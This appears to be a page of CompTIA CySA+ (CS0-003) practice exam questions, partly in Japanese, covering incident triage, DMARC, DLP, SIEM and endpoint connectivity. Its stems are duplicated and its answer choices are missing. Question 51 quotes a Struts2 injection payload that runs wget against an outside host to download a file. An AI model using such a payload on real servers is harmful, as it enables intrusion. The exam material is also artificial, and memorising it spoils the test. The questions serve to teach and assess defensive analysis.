CS0-003 試験問題 51
An incident response team member is triaging a Linux server. The output is shown below:
$ cat /etc/passwd
root:x:0:0::/:/bin/zsh
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
http:x:33:33::/srv/http:/bin/bash
nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
git:x:972:972:git daemon user:/:/usr/bin/git-shell
$ cat /var/log/httpd
at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208) at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316) at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) WARN
[struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget
http://grohl.ve.da/tmp/brkgtr.zip;#whoami)
at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.<init> (FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator (FileUploadBase.java:334) at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.
java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest (JakartaMultipartRequest.java:423) Which of the following is the adversary most likely trying to do?
$ cat /etc/passwd
root:x:0:0::/:/bin/zsh
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
http:x:33:33::/srv/http:/bin/bash
nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
git:x:972:972:git daemon user:/:/usr/bin/git-shell
$ cat /var/log/httpd
at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208) at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316) at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) WARN
[struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget
http://grohl.ve.da/tmp/brkgtr.zip;#whoami)
at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.<init> (FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator (FileUploadBase.java:334) at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.
java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest (JakartaMultipartRequest.java:423) Which of the following is the adversary most likely trying to do?
CS0-003 試験問題 52
ある企業のドメインが、多数のフィッシング攻撃キャンペーンに利用されています。アナリストは、この企業がドメインスプーフィングの被害に遭っているかどうかを判断しなければなりません。DMARCレコードは、メールボックスプロバイダにDMARCに違反するメールを無視するよう指示するはずですが、レコードを確認した結果、以下の点が判明しました。
v=DMARC1; p=なし; fo=0; rua=mailto:[email protected];
ruf=mailto:[email protected]; adkim=r; rf=afrf; ri=86400;
会社の要件がメールボックス プロバイダーによって正しく処理されていない理由を最もよく説明するのは次のどれですか。
v=DMARC1; p=なし; fo=0; rua=mailto:[email protected];
ruf=mailto:[email protected]; adkim=r; rf=afrf; ri=86400;
会社の要件がメールボックス プロバイダーによって正しく処理されていない理由を最もよく説明するのは次のどれですか。
CS0-003 試験問題 53
The management team has asked a senior security engineer to explore DLP security solutions for the company's growing use of cloud-based storage. Which of the following is an appropriate solution to control the sensitive data that is being stored in the cloud?
CS0-003 試験問題 54
アナリストのチームは、さまざまなソースからの情報を相関させ、その情報を分析し、会社のポリシーに従って通知をトリガーする新しい社内システムを開発しています。
次のテクノロジのうちどれが導入されましたか?
次のテクノロジのうちどれが導入されましたか?
CS0-003 試験問題 55
After an upgrade to a new EDR, a security analyst received reports that several endpoints were not communicating with the SaaS provider to receive critical threat signatures. To comply with the incident response playbook, the security analyst was required to validate connectivity to ensure communications. The security analyst ran a command that provided the following output:
ComputerName: comptia007
RemotePort: 443
InterfaceAlias: Ethernet 3
TcpTestSucceeded: False
Which of the following did the analyst use to ensure connectivity?
ComputerName: comptia007
RemotePort: 443
InterfaceAlias: Ethernet 3
TcpTestSucceeded: False
Which of the following did the analyst use to ensure connectivity?